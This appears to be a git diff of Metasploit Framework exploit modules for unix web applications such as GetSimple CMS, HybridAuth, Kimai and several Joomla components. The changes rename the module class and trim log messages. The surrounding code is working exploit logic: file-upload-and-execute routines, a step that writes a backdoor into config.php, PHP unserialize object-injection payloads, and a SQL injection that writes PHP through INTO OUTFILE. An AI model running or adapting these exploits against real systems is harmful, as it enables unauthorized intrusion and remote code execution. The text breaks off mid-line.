b/modules/exploits/unix/webapp/get_simple_cms_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp @@ -93,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - print_status("#{peer} - Version #{version} found") + print_status("Version #{version} found") if Gem::Version.new(version) <= Gem::Version.new('3.1.2') return Exploit::CheckCode::Appears @@ -103,34 +103,34 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Authenticating...") + print_status("Authenticating...") res = send_request_auth if res && res.code == 302 - print_status("#{peer} - The authentication process is done successfully!") + print_status("The authentication process is done successfully!") else fail_with(Failure::NoAccess, "#{peer} - Authentication failed") end - print_status("#{peer} - Extracting Cookies Information...") + print_status("Extracting Cookies Information...") cookie = res.get_cookies if cookie.blank? fail_with(Failure::NoAccess, "#{peer} - Authentication failed") end - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") payload_name = rand_text_alpha_lower(rand(10) + 5) + '.pht' res = send_request_upload(payload_name, cookie) if res && res.code == 200 && res.body && res.body.to_s =~ /Success! File location.*>.*#{target_uri.path.to_s}(.*)#{payload_name}</ upload_path = $1 - print_good("#{peer} - File uploaded to #{upload_path}") + print_good("File uploaded to #{upload_path}") register_file_for_cleanup(payload_name) else fail_with(Failure::Unknown, "#{peer} - Upload failed") end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") send_request_raw({ 'uri' => normalize_uri(target_uri.path.to_s, upload_path, payload_name), 'method' => 'GET' diff --git a/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb b/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb index bc505ad66f..97d0e53509 100644 --- a/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb +++ b/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer diff --git a/modules/exploits/unix/webapp/graphite_pickle_exec.rb b/modules/exploits/unix/webapp/graphite_pickle_exec.rb index 29ebbb1775..9cd39b23bd 100644 --- a/modules/exploits/unix/webapp/graphite_pickle_exec.rb +++ b/modules/exploits/unix/webapp/graphite_pickle_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/guestbook_ssi_exec.rb b/modules/exploits/unix/webapp/guestbook_ssi_exec.rb index 53b9e6911c..3be8d20512 100644 --- a/modules/exploits/unix/webapp/guestbook_ssi_exec.rb +++ b/modules/exploits/unix/webapp/guestbook_ssi_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/hastymail_exec.rb b/modules/exploits/unix/webapp/hastymail_exec.rb index 13ce643e2e..1d3a6013ee 100644 --- a/modules/exploits/unix/webapp/hastymail_exec.rb +++ b/modules/exploits/unix/webapp/hastymail_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -68,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote login if not @session_id or @session_id.empty? - vprint_error "#{peer} - Authentication failed" + vprint_error "Authentication failed" return Exploit::CheckCode::Unknown end @@ -104,7 +104,7 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 303 @session_id = res.get_cookies - print_good "#{peer} - Authentication successful" + print_good "Authentication successful" end end @@ -113,15 +113,15 @@ class Metasploit3 < Msf::Exploit::Remote @uri << '/' if @uri[-1,1] != '/' @session_id = "" - print_status "#{peer} - Trying login" + print_status "Trying login" login if not @session_id or @session_id.empty? - print_error "#{peer} - Authentication failed" + print_error "Authentication failed" return end - print_status "#{peer} - Authentication successfully, trying to exploit" + print_status "Authentication successfully, trying to exploit" data = "rs=passthru&" data << "rsargs[]=#{rand_text_alpha(rand(4) + 4)}&" @@ -138,7 +138,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res or res.code != 200 or not res.body =~ /\+/ - print_error "#{peer} - Exploitation failed" + print_error "Exploitation failed" return end diff --git a/modules/exploits/unix/webapp/havalite_upload_exec.rb b/modules/exploits/unix/webapp/havalite_upload_exec.rb index 311d36732b..f74529955c 100644 --- a/modules/exploits/unix/webapp/havalite_upload_exec.rb +++ b/modules/exploits/unix/webapp/havalite_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_raw({'uri' => uri}) if not res - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return Exploit::CheckCode::Unknown end @@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || '' if not version.empty? and version =~ /1\.1\.7/ - vprint_status("#{peer} - Version found: #{version}") + vprint_status("Version found: #{version}") return Exploit::CheckCode::Appears end @@ -124,10 +124,10 @@ class Metasploit3 < Msf::Exploit::Remote def exploit base = target_uri.path - print_status("#{peer} - Uploading malicious file...") + print_status("Uploading malicious file...") fname = upload(base) - print_status("#{peer} - Executing #{fname}...") + print_status("Executing #{fname}...") exec(base, fname) end end diff --git a/modules/exploits/unix/webapp/horde_unserialize_exec.rb b/modules/exploits/unix/webapp/horde_unserialize_exec.rb index 92437ae125..cb51feb8a5 100644 --- a/modules/exploits/unix/webapp/horde_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/horde_unserialize_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -61,12 +61,12 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Testing injection...") + print_status("Testing injection...") unless check == Exploit::CheckCode::Vulnerable fail_with(Failure::NotVulnerable, "#{peer} - Target isn't vulnerable, exiting...") end - print_status("#{peer} - Exploiting the unserialize()...") + print_status("Exploiting the unserialize()...") send_request_exploit(payload.encoded) end diff --git a/modules/exploits/unix/webapp/hybridauth_install_php_exec.rb b/modules/exploits/unix/webapp/hybridauth_install_php_exec.rb index 2ca9e0026e..1932c444a3 100644 --- a/modules/exploits/unix/webapp/hybridauth_install_php_exec.rb +++ b/modules/exploits/unix/webapp/hybridauth_install_php_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking # application config.php is overwritten include Msf::Exploit::Remote::HttpClient @@ -61,19 +61,19 @@ class Metasploit3 < Msf::Exploit::Remote def check res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'install.php') if !res - vprint_error "#{peer} - Connection failed" + vprint_error "Connection failed" return Exploit::CheckCode::Unknown elsif res.code == 404 - vprint_error "#{peer} - Could not find install.php" + vprint_error "Could not find install.php" elsif res.body =~ />([^<]+)<\/span> must be <b >WRITABLE</ - vprint_error "#{peer} - #{$1} is not writable" + vprint_error "#{$1} is not writable" elsif res.body =~ />HybridAuth (2\.[012]\.[\d\.]+(-dev)?) Installer</ version = res.body.scan(/>HybridAuth (2\.[012]\.[\d\.]+(-dev)?) Installer</).first.first - vprint_status "#{peer} - Found version: #{version}" + vprint_status "Found version: #{version}" if version =~ /^2\.(0\.(9|10|11)|1\.[\d]+|2\.[012])/ return Exploit::CheckCode::Vulnerable else - vprint_error "#{peer} - HybridAuth version #{version} is not vulnerable" + vprint_error "HybridAuth version #{version} is not vulnerable" end end Exploit::CheckCode::Safe @@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote end # write backdoor - print_status "#{peer} - Writing backdoor to config.php" + print_status "Writing backdoor to config.php" payload_param = rand(1000) res = send_request_cgi( 'method' => 'POST', @@ -99,40 +99,40 @@ class Metasploit3 < Msf::Exploit::Remote if !res fail_with Failure::Unknown, "#{peer} - Connection failed" elsif res.body =~ /Installation completed/ - print_good "#{peer} - Wrote backdoor successfully" + print_good "Wrote backdoor successfully" else fail_with Failure::UnexpectedReply, "#{peer} - Coud not write backdoor to 'config.php'" end # execute payload code = Rex::Text.encode_base64(payload.encoded) - print_status "#{peer} - Sending payload to config.php backdoor (#{code.length} bytes)" + print_status "Sending payload to config.php backdoor (#{code.length} bytes)" res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'config.php'), 'data' => "#{payload_param}=#{code}" }, 5) if !res - print_warning "#{peer} - No response" + print_warning "No response" elsif res.code == 404 fail_with Failure::NotFound, "#{peer} - Could not find config.php" elsif res.code == 200 || res.code == 500 - print_good "#{peer} - Sent payload successfully" + print_good "Sent payload successfully" end # remove backdoor - print_status "#{peer} - Removing backdoor from config.php" + print_status "Removing backdoor from config.php" res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'install.php'), 'data' => 'OPENID_ADAPTER_STATUS=' ) if !res - print_error "#{peer} - Connection failed" + print_error "Connection failed" elsif res.body =~ /Installation completed/ - print_good "#{peer} - Removed backdoor successfully" + print_good "Removed backdoor successfully" else - print_warning "#{peer} - Could not remove payload from config.php" + print_warning "Could not remove payload from config.php" end end end diff --git a/modules/exploits/unix/webapp/instantcms_exec.rb b/modules/exploits/unix/webapp/instantcms_exec.rb index 0fb2359c31..593e52d53b 100644 --- a/modules/exploits/unix/webapp/instantcms_exec.rb +++ b/modules/exploits/unix/webapp/instantcms_exec.rb @@ -1,7 +1,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb b/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb index 8544567488..c684cd70a8 100644 --- a/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -67,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote end def cookie_prefix - print_status("#{peer} - Checking for cookie prefix") + print_status("Checking for cookie prefix") cookie_prefix = "" res = send_request_cgi( { @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.get_cookies =~ /(.+)session/ - print_status("#{peer} - Cookie prefix #{$1} found") + print_status("Cookie prefix #{$1} found") cookie_prefix = $1 end return cookie_prefix @@ -104,11 +104,11 @@ class Metasploit3 < Msf::Exploit::Remote if client.type == "meterpreter" client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") begin - print_warning("#{peer} - Deleting #{@upload_php}") + print_warning("Deleting #{@upload_php}") client.fs.file.rm(@upload_php) - print_good("#{peer} - #{@upload_php} removed to stay ninja") + print_good("#{@upload_php} removed to stay ninja") rescue - print_error("#{peer} - Unable to remove #{f}") + print_error("Unable to remove #{f}") end end end @@ -129,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote db_driver_mysql = "a:1:{i:0;O:15:\"db_driver_mysql\":1:{s:3:\"obj\";a:2:{s:13:\"use_debug_log\";i:1;s:9:\"debug_log\";s:#{"cache/#{@upload_php}".length}:\"cache/#{@upload_php}\";}}}" - print_status("#{peer} - Exploiting the unserialize() to upload PHP code") + print_status("Exploiting the unserialize() to upload PHP code") res = send_request_cgi( { @@ -139,16 +139,16 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res or res.code != 200 - print_error("#{peer} - Exploit failed: #{res.code}") + print_error("Exploit failed: #{res.code}") return end - print_status("#{peer} - Executing the payload #{@upload_php}") + print_status("Executing the payload #{@upload_php}") res = send_request_raw({'uri' => "#{base}cache/#{@upload_php}"}) if res - print_error("#{peer} - Payload execution failed: #{res.code}") + print_error("Payload execution failed: #{res.code}") return end diff --git a/modules/exploits/unix/webapp/joomla_akeeba_unserialize.rb b/modules/exploits/unix/webapp/joomla_akeeba_unserialize.rb index 4319647596..7fd532a986 100644 --- a/modules/exploits/unix/webapp/joomla_akeeba_unserialize.rb +++ b/modules/exploits/unix/webapp/joomla_akeeba_unserialize.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/zip' require 'json' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote @zip = zip_file.pack # First step: call restore to run _prepare() and get an initialized AKFactory - print_status("#{peer} - Sending PHP serialized object...") + print_status("Sending PHP serialized object...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', 'restore.php'), 'vars_get' => { @@ -104,7 +104,7 @@ class Metasploit3 < Msf::Exploit::Remote prepared_factory = Rex::Text.decode_base64(b64encoded_prepared_factory) modified_factory = prepared_factory.gsub('currentPartNumber";i:0', 'currentPartNumber";i:-1') - print_status("#{peer} - Sending initialized and modified AKFactory...") + print_status("Sending initialized and modified AKFactory...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', 'restore.php'), 'vars_get' => { @@ -119,7 +119,7 @@ class Metasploit3 < Msf::Exploit::Remote register_files_for_cleanup(php_filename) - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") send_request_cgi({ 'uri' => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', php_filename) }, 2) diff --git a/modules/exploits/unix/webapp/joomla_comjce_imgmanager.rb b/modules/exploits/unix/webapp/joomla_comjce_imgmanager.rb index af1204f917..f36e78b209 100644 --- a/modules/exploits/unix/webapp/joomla_comjce_imgmanager.rb +++ b/modules/exploits/unix/webapp/joomla_comjce_imgmanager.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/joomla_contenthistory_sqli_rce.rb b/modules/exploits/unix/webapp/joomla_contenthistory_sqli_rce.rb index fa6e5d8723..ab54eecfc5 100644 --- a/modules/exploits/unix/webapp/joomla_contenthistory_sqli_rce.rb +++ b/modules/exploits/unix/webapp/joomla_contenthistory_sqli_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -108,7 +108,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 500 && res.body =~ /`(.*)_ucm_history`/ table_prefix = $1 - print_status("#{peer} - Retrieved table prefix [ #{table_prefix} ]") + print_status("Retrieved table prefix [ #{table_prefix} ]") else fail_with(Failure::Unknown, "#{peer} - Error retrieving table prefix") end @@ -118,7 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 500 && res.body =~ /Duplicate entry '([a-z0-9]+)' for key/ auth_cookie_part = $1[0...-1] - print_status("#{peer} - Retrieved admin cookie [ #{auth_cookie_part} ]") + print_status("Retrieved admin cookie [ #{auth_cookie_part} ]") else fail_with(Failure::Unknown, "#{peer}: No logged-in admin user found!") end @@ -131,7 +131,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.get_cookies =~ /^([a-z0-9]+)=[a-z0-9]+;/ cookie_begin = $1 - print_status("#{peer} - Retrieved unauthenticated cookie [ #{cookie_begin} ]") + print_status("Retrieved unauthenticated cookie [ #{cookie_begin} ]") else fail_with(Failure::Unknown, "#{peer} - Error retrieving unauthenticated cookie") end @@ -150,7 +150,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 && res.body =~ /Administration - Control Panel/ - print_status("#{peer} - Successfully authenticated as Administrator") + print_status("Successfully authenticated as Administrator") else fail_with(Failure::Unknown, "#{peer} - Session failure") end @@ -178,7 +178,7 @@ class Metasploit3 < Msf::Exploit::Remote filename = rand_text_alphanumeric(rand(10)+6) # Create file - print_status("#{peer} - Creating file [ #{filename}.php ]") + print_status("Creating file [ #{filename}.php ]") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "administrator", "index.php"), @@ -198,7 +198,7 @@ class Metasploit3 < Msf::Exploit::Remote # Grab token if res && res.code == 303 && res.headers['Location'] location = res.headers['Location'] - print_status("#{peer} - Following redirect to [ #{location} ]") + print_status("Following redirect to [ #{location} ]") res = send_request_cgi( 'uri' => location, 'method' => 'GET', @@ -208,14 +208,14 @@ class Metasploit3 < Msf::Exploit::Remote # Retrieving template token if res && res.code == 200 && res.body =~ /&([a-z0-9]+)=1\">/ token = $1 - print_status("#{peer} - Token [ #{token} ] retrieved") + print_status("Token [ #{token} ] retrieved") else fail_with(Failure::Unknown, "#{peer} - Retrieving token failed") end if res && res.code == 200 && res.body =~ /(\/templates\/.*\/)template_preview.png/ template_path = $1 - print_status("#{peer} - Template path [ #{template_path} ] retrieved") + print_status("Template path [ #{template_path} ] retrieved") else fail_with(Failure::Unknown, "#{peer} - Unable to retrieve template path") end @@ -227,7 +227,7 @@ class Metasploit3 < Msf::Exploit::Remote filename_base64 = Rex::Text.encode_base64("/#{filename}.php") # Inject payload data into file - print_status("#{peer} - Insert payload into file [ #{filename}.php ]") + print_status("Insert payload into file [ #{filename}.php ]") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "administrator", "index.php"), @@ -248,14 +248,14 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 303 && res.headers['Location'] =~ /\/administrator\/index.php\?option=com_templates&view=template&id=#{template_id}&file=/ - print_status("#{peer} - Payload data inserted into [ #{filename}.php ]") + print_status("Payload data inserted into [ #{filename}.php ]") else fail_with(Failure::Unknown, "#{peer} - Could not insert payload into file [ #{filename}.php ]") end # Request payload register_files_for_cleanup("#{filename}.php") - print_status("#{peer} - Executing payload") + print_status("Executing payload") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, template_path, "#{filename}.php"), diff --git a/modules/exploits/unix/webapp/joomla_media_upload_exec.rb b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb index cad27d9654..1e7eb42741 100644 --- a/modules/exploits/unix/webapp/joomla_media_upload_exec.rb +++ b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -70,10 +70,10 @@ class Metasploit3 < Msf::Exploit::Remote if res and (res.code == 200 or res.code == 302) if res.body =~ /You are not authorised to view this resource/ - vprint_status("#{peer} - Joomla Media Manager Found but authentication required") + vprint_status("Joomla Media Manager Found but authentication required") return Exploit::CheckCode::Detected elsif res.body =~ /<form action="(.*)" id="uploadForm"/ - vprint_status("#{peer} - Joomla Media Manager Found and authentication isn't required") + vprint_status("Joomla Media Manager Found and authentication isn't required") return Exploit::CheckCode::Detected end end @@ -174,18 +174,18 @@ class Metasploit3 < Msf::Exploit::Remote @username = datastore['USERNAME'] @password = datastore['PASSWORD'] - print_status("#{peer} - Checking Access to Media Component...") + print_status("Checking Access to Media Component...") res = get_upload_form if res and (res.code == 200 or res.code == 302) and !res.get_cookies.empty? and res.body =~ /You are not authorised to view this resource/ - print_status("#{peer} - Authentication required... Proceeding...") + print_status("Authentication required... Proceeding...") if @username.empty? or @password.empty? fail_with(Failure::BadConfig, "#{peer} - Authentication is required to access the Media Manager Component, please provide credentials") end @cookies = res.get_cookies.sub(/;$/, "") - print_status("#{peer} - Accessing the Login Form...") + print_status("Accessing the Login Form...") res = get_login_form if res.nil? or (res.code != 200 and res.code != 302) or res.body !~ /login/ fail_with(Failure::Unknown, "#{peer} - Unable to Access the Login Form") @@ -197,13 +197,13 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoAccess, "#{peer} - Unable to Authenticate") end elsif res and (res.code == 200 or res.code == 302) and !res.get_cookies.empty? and res.body =~ /<form action="(.*)" id="uploadForm"/ - print_status("#{peer} - Authentication isn't required.... Proceeding...") + print_status("Authentication isn't required.... Proceeding...") @cookies = res.get_cookies.sub(/;$/, "") else fail_with(Failure::UnexpectedReply, "#{peer} - Failed to Access the Media Manager Component") end - print_status("#{peer} - Accessing the Upload Form...") + print_status("Accessing the Upload Form...") res = get_upload_form if res and (res.code == 200 or res.code == 302) and res.body =~ /<form action="(.*)" id="uploadForm"/ @@ -212,7 +212,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Unable to Access the Upload Form") end - print_status("#{peer} - Uploading shell...") + print_status("Uploading shell...") res = upload(upload_uri) @@ -221,7 +221,7 @@ class Metasploit3 < Msf::Exploit::Remote end register_files_for_cleanup("#{@upload_name}.") - print_status("#{peer} - Executing shell...") + print_status("Executing shell...") send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "images", @upload_name), diff --git a/modules/exploits/unix/webapp/joomla_tinybrowser.rb b/modules/exploits/unix/webapp/joomla_tinybrowser.rb index 5286bf927d..15e2279e94 100644 --- a/modules/exploits/unix/webapp/joomla_tinybrowser.rb +++ b/modules/exploits/unix/webapp/joomla_tinybrowser.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/kimai_sqli.rb b/modules/exploits/unix/webapp/kimai_sqli.rb index b088c8e86f..3b8111d4b0 100644 --- a/modules/exploits/unix/webapp/kimai_sqli.rb +++ b/modules/exploits/unix/webapp/kimai_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient @@ -63,14 +63,14 @@ class Metasploit3 < Msf::Exploit::Remote # Checks if target is Kimai version 0.9.2.x # def check - vprint_status("#{peer} - Checking version...") + vprint_status("Checking version...") res = send_request_raw({ 'uri' => normalize_uri(target_uri.path, "index.php") }) if not res - vprint_error("#{peer} - Request timed out") + vprint_error("Request timed out") return Exploit::CheckCode::Unknown elsif res.body =~ /Kimai/ and res.body =~ /(0\.9\.[\d\.]+)<\/strong>/ version = "#{$1}" - print_good("#{peer} - Found version: #{version}") + print_good("Found version: #{version}") if version >= "0.9.2" and version <= "0.9.2.1306" return Exploit::CheckCode::Appears end @@ -81,33 +81,33 @@ class Metasploit3 < Msf::Exploit::Remote def exploit # Get file system path - print_status("#{peer} - Retrieving file system path...") + print_status("Retrieving file system path...") res = send_request_raw({ 'uri' => normalize_uri(target_uri.path, 'includes/vars.php') }) if not res fail_with(Failure::Unknown, "#{peer} - Request timed out") elsif res.body =~ /Undefined variable: .+ in (.+)includes\/vars\.php on line \d+/ path = "#{$1}" - print_good("#{peer} - Found file system path: #{path}") + print_good("Found file system path: #{path}") else path = normalize_uri(datastore['FALLBACK_TARGET_PATH'], target_uri.path) - print_warning("#{peer} - Could not retrieve file system path. Assuming '#{path}'") + print_warning("Could not retrieve file system path. Assuming '#{path}'") end # Get MySQL table name prefix from temporary/logfile.txt - print_status("#{peer} - Retrieving MySQL table name prefix...") + print_status("Retrieving MySQL table name prefix...") res = send_request_raw({ 'uri' => normalize_uri(target_uri.path, 'temporary', 'logfile.txt') }) if not res fail_with(Failure::Unknown, "#{peer} - Request timed out") elsif prefixes = res.body.scan(/CREATE TABLE `(.+)usr`/) table_prefix = "#{prefixes.flatten.last}" - print_good("#{peer} - Found table name prefix: #{table_prefix}") + print_good("Found table name prefix: #{table_prefix}") else table_prefix = normalize_uri(datastore['FALLBACK_TABLE_PREFIX'], target_uri.path) - print_warning("#{peer} - Could not retrieve MySQL table name prefix. Assuming '#{table_prefix}'") + print_warning("Could not retrieve MySQL table name prefix. Assuming '#{table_prefix}'") end # Create a backup ID - print_status("#{peer} - Creating a backup to get a valid backup ID...") + print_status("Creating a backup to get a valid backup ID...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'db_restore.php'), @@ -119,7 +119,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Request timed out") elsif backup_ids = res.body.scan(/name="dates\[\]" value="(\d+)">/) id = "#{backup_ids.flatten.last}" - print_good("#{peer} - Found backup ID: #{id}") + print_good("Found backup ID: #{id}") else fail_with(Failure::Unknown, "#{peer} - Could not retrieve backup ID") end @@ -127,7 +127,7 @@ class Metasploit3 < Msf::Exploit::Remote # Write PHP payload to disk using MySQL injection 'into outfile' fname = "#{rand_text_alphanumeric(rand(10)+10)}.php" sqli = "#{id}_#{table_prefix}var UNION SELECT '<?php #{payload.encoded} ?>' INTO OUTFILE '#{path}/temporary/#{fname}';-- " - print_status("#{peer} - Writing payload (#{payload.encoded.length} bytes) to '#{path}/temporary/#{fname}'...") + print_status("Writing payload (#{payload.encoded.length} bytes) to '#{path}/temporary/#{fname}'...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'db_restore.php'), @@ -139,14 +139,14 @@ class Metasploit3 < Msf::Exploit::Remote if not res fail_with(Failure::Unknown, "#{peer} - Request timed out") elsif res.code == 200 - print_good("#{peer} - Payload sent successfully") + print_good("Payload sent successfully") register_files_for_cleanup(fname) else - print_error("#{peer} - Sending payload failed. Received HTTP code: #{res.code}") + print_error("Sending payload failed. Received HTTP code: #{res.code}") end # Remove the backup - print_status("#{peer} - Removing the backup...") + print_status("Removing the backup...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'db_restore.php'), @@ -156,15 +156,15 @@ class Metasploit3 < Msf::Exploit::Remote }.to_a.shuffle] }) if not res - print_warning("#{peer} - Request timed out") + print_warning("Request timed out") elsif res.code == 302 and res.body !~ /#{id}/ - vprint_good("#{peer} - Deleted backup with ID '#{id}'") + vprint_good("Deleted backup with ID '#{id}'") else - print_warning("#{peer} - Could not remove backup with ID '#{id}'") + print_warning("Could not remove backup with ID '#{id}'") end # Execute payload - print_status("#{peer} - Retrieving file '#{fname}'...") + print_status("Retrieving file '#{fname}'...") res = send_request_raw({ 'uri' => normalize_uri(target_uri.path, 'temporary', "#{fname}") }, 5) diff --git a/modules/exploits/unix/webapp/libretto_upload_exec.rb b/modules/exploits/unix/webapp/libretto_upload_exec.rb index 8030e347cc..af5e4c5445 100644 --- a/modules/exploits/unix/webapp/libretto_upload_exec.rb +++ b/modules/exploits/unix/webapp/libretto_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote def check res = send_request_raw({'uri' => normalize_uri(target_uri.path)}) if not res - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return Exploit::CheckCode::Unknown end @@ -132,13 +132,13 @@ class Metasploit3 < Msf::Exploit::Remote def exploit base = target_uri.path - print_status("#{peer} - Uploading malicious file...") + print_status("Uploading malicious file...") orig_fname = upload(base) - print_status("#{peer} - Renaming #{orig_fname}...") + print_status("Renaming #{orig_fname}...") new_fname = rename(base, orig_fname) - print_status("#{peer} - Executing #{new_fname}...") + print_status("Executing #{new_fname}...") exec(base, new_fname) end end diff --git a/modules/exploits/unix/webapp/maarch_letterbox_file_upload.rb b/modules/exploits/unix/webapp/maarch_letterbox_file_upload.rb index fc9b180f61..f12ba7d45d 100644 --- a/modules/exploits/unix/webapp/maarch_letterbox_file_upload.rb +++ b/modules/exploits/unix/webapp/maarch_letterbox_file_upload.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'uri' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -70,11 +70,11 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Preparing payload...") + print_status("Preparing payload...") payload_name = "#{Rex::Text.rand_text_alpha(10)}.php" data = generate_mime_message(payload, payload_name) - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") res = send_request_cgi( 'method' => 'POST', 'uri' => letterbox_upload_url, @@ -84,13 +84,13 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unreachable, 'No response from the target') if res.nil? fail_with(Failure::UnexpectedReply, "Server responded with status code #{res.code}") if res.code != 200 - print_status("#{peer} - Parsing server response...") + print_status("Parsing server response...") captures = res.body.match(/\[local_path\] => (.*\.php)/i).captures fail_with(Failure::UnexpectedReply, 'Unable to parse the server response') if captures.nil? || captures[0].nil? payload_url = 